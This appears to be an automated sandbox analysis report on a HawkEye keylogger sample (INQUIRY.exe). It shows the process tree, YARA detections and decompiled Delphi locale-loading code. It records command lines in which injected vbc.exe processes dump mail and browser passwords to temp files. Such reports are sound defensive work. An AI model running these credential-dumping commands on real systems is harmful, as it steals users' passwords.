                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      Chronological Activities

                                                                      Analysis Process: INQUIRY.exe PID: 240 Parent PID: 6400

                                                                      General

                                                                      Start time:15:03:14
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.863445427.0000000003961000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.863445427.0000000003961000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.863232173.0000000002DE0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      Chronological Activities

                                                                      Analysis Process: INQUIRY.exe PID: 6428 Parent PID: 6400

                                                                      General

                                                                      Start time:15:03:16
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\INQUIRY.exe' 2 240 5445406
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Reputation:low

                                                                      Chronological Activities

                                                                      Analysis Process: dw20.exe PID: 204 Parent PID: 240

                                                                      General

                                                                      Start time:15:03:22
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:dw20.exe -x -s 2100
                                                                      Imagebase:0x10000000
                                                                      File size:33936 bytes
                                                                      MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Chronological Activities

                                                                      Analysis Process: INQUIRY.exe PID: 6900 Parent PID: 6428

                                                                      General

                                                                      Start time:15:03:29
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      Chronological Activities

                                                                      Analysis Process: INQUIRY.exe PID: 1364 Parent PID: 6900

                                                                      General

                                                                      Start time:15:03:30
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000002.929210977.0000000003A21000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000021.00000002.929210977.0000000003A21000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      Chronological Activities

                                                                      Analysis Process: INQUIRY.exe PID: 4424 Parent PID: 6900

                                                                      General

                                                                      Start time:15:03:31
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\INQUIRY.exe' 2 1364 5460187
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Reputation:low

                                                                      Chronological Activities

                                                                      Analysis Process: dw20.exe PID: 6380 Parent PID: 1364

                                                                      General

                                                                      Start time:15:03:34
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:dw20.exe -x -s 2284
                                                                      Imagebase:0x10000000
                                                                      File size:33936 bytes
                                                                      MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Chronological Activities

                                                                      Analysis Process: vbc.exe PID: 5396 Parent PID: 1364

                                                                      General

                                                                      Start time:15:03:38
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                      Imagebase:0x400000
                                                                      File size:1171592 bytes
                                                                      MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000024.00000002.888584585.0000000000400000.00000040.00000001.sdmp, Author: Joe Security

                                                                      Chronological Activities

                                                                      Analysis Process: vbc.exe PID: 3064 Parent PID: 1364

                                                                      General

                                                                      Start time:15:03:38
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                      Imagebase:0x400000
                                                                      File size:1171592 bytes
                                                                      MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000025.00000002.894159498.0000000000400000.00000040.00000001.sdmp, Author: Joe Security

                                                                      Chronological Activities

                                                                      Analysis Process: WerFault.exe PID: 7076 Parent PID: 1364

                                                                      General

                                                                      Start time:15:03:40
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 2096
                                                                      Imagebase:0x990000
                                                                      File size:434592 bytes
                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET

                                                                      Chronological Activities

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Reset < >

                                                                        Analysis Process: INQUIRY.exe PID: 2016 Parent PID: 5852 INQUIRY.exeCOMMON

                                                                        Executed Functions

                                                                        Function 00405CA0, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 65%
                                                                        			E00405CA0(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x405da5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00405AE8( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E00405F0C, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E00405DAC);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L00401338();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401340();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L00401338();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L00401338();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L00401338();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























                                                                        0x00405ca1
                                                                        0x00405ca3
                                                                        0x00405cab
                                                                        0x00405cbc
                                                                        0x00405cc1
                                                                        0x00405cda
                                                                        0x00405ce1
                                                                        0x00405d23
                                                                        0x00405d25
                                                                        0x00405d26
                                                                        0x00405d2b
                                                                        0x00405d2e
                                                                        0x00405d31
                                                                        0x00405d43
                                                                        0x00405d66
                                                                        0x00405d86
                                                                        0x00405d86
                                                                        0x00405d8a
                                                                        0x00405d90
                                                                        0x00405d93
                                                                        0x00405d96
                                                                        0x00405da4
                                                                        0x00405ce3
                                                                        0x00405cf8
                                                                        0x00405cff
                                                                        0x00000000
                                                                        0x00405d01
                                                                        0x00405d16
                                                                        0x00405d1d
                                                                        0x00405dac
                                                                        0x00405db4
                                                                        0x00405dbb
                                                                        0x00405dbc
                                                                        0x00405dcf
                                                                        0x00405dd4
                                                                        0x00405ddd
                                                                        0x00405df3
                                                                        0x00405df9
                                                                        0x00405dfa
                                                                        0x00405e07
                                                                        0x00405e0c
                                                                        0x00405e0b
                                                                        0x00405e0b
                                                                        0x00405e1b
                                                                        0x00405e23
                                                                        0x00405e29
                                                                        0x00405e2e
                                                                        0x00405e3b
                                                                        0x00405e3f
                                                                        0x00405e40
                                                                        0x00405e41
                                                                        0x00405e56
                                                                        0x00405e56
                                                                        0x00405e5a
                                                                        0x00405e73
                                                                        0x00405e77
                                                                        0x00405e78
                                                                        0x00405e79
                                                                        0x00405e89
                                                                        0x00405e8e
                                                                        0x00405e92
                                                                        0x00405e94
                                                                        0x00405ea9
                                                                        0x00405ead
                                                                        0x00405eae
                                                                        0x00405eaf
                                                                        0x00405ebf
                                                                        0x00405ec4
                                                                        0x00405ec4
                                                                        0x00405e92
                                                                        0x00405e5a
                                                                        0x00405e23
                                                                        0x00405ecd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405d1d
                                                                        0x00405cff

                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0047A08C,?,00405A90,00400000,?,00000105,00000001,004104D0,00405ACC,00406578,0000FF99,?), ref: 00405CBC
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047A08C,?,00405A90,00400000,?,00000105,00000001), ref: 00405CDA
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047A08C), ref: 00405CF8
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405D16
                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405D5F
                                                                        • RegQueryValueExA.ADVAPI32(?,00405F0C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001), ref: 00405D7D
                                                                        • RegCloseKey.ADVAPI32(?,00405DAC,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D9F
